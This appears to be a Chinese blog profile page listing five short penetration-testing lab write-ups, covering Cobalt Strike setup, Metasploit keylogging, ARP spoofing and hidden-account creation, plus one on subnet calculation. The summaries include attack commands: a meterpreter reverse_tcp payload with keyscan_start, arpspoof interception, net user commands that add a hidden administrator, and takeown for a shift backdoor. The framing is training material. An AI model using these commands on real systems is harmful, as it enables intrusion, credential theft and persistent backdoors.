- 博客(5)
- 收藏
- 关注
原创 CS 简单的操作实验报告
查看kali IP地址,运行teamserver文件使用ifconfig命令对自己的kali进行IP地址查询,使用./teamserver 192.168.32.131 admin命令进行启动teamserver文件,看到50050端口说明启动成功, 启动客户端桌面文件。5、进行靶机的渗透操作,抓取靶机的明文密码,使用截屏命令(screenshot)进行靶机截屏,使用浏览探测中的VNC桌面交互工具进行靶机的远程操控。在终端使用ls命令进行软件内文件的查看,在使用chmod 777 *命令进行提权。
2024-11-24 21:40:54
255
原创 渗透测试基础——MSF键盘监听
⑥用 use 0 选择漏洞载荷,用 set payload 设置攻击载荷 命令为:set payload windows/x64/meterpreter/reverse_tcp,设置受害者还攻击者 ip.命令为:set rhost ip 受害者 set lhost ip 攻击者。②打开 win7 和 kali,在 cmd 终端用 ipconfig win7 IP,再kali 中用ifconfig查看IP,IP 就是系统的身份证。开始键盘监听,命令为:keyscan_start。⑧开始攻击,命令为:run。
2024-11-24 14:25:28
286
原创 网络号、主机号、子网掩码的计算
由/23得出是子网掩码,表示32位中前23位是1,其它位为0,并从IP 182得知为B类。由/23得出是子网掩码,表示32位中前15位是1,其它位为0,并从IP 162得知为B类。由/9得出是子网掩码,表示32位中前9位是1,其它位为0,并从IP10得知为A类。由/9得出是子网掩码,表示32位中前4位是1,其它位为0,并从IP10得知为A类。网络位 主机位。网络位 主机位。
2024-11-24 10:35:37
1554
原创 渗透测试实战之ARP欺骗攻击(ARP断网攻击)
arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。执行ping扫描最简单的方法是使用工具fping,fping使用ICMP ECHO一次请求多个主机,对当前局域网还存在那些主机进行快速扫描,以确定要攻击的主机的ip地址。在kali终端中,输入命令“ifconfig”,查看kali的IP地址与MAC地址,如图所示。2、访问登录网址,输入用户名及密码。
2024-11-22 22:04:34
2127
原创 隐藏账户和创建账户以及shift后门
默认组不具备管理员权限,将用户名加入哪个组就是写哪个组名,输入指令net localgroupadministrators 模(用户名)/add,再输入net user mo查看。隐藏账户:输入指令net user csb$(用户名后边一定要跟$符号) csb /add,再输入net user查看就会看不到此用户。win+r打开cmd终端,输入takeown /f c:\windows\system32\*.* /a /r /d y,激活用户:输入net user csb$ /active:yes。
2024-11-19 18:58:31
1085
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人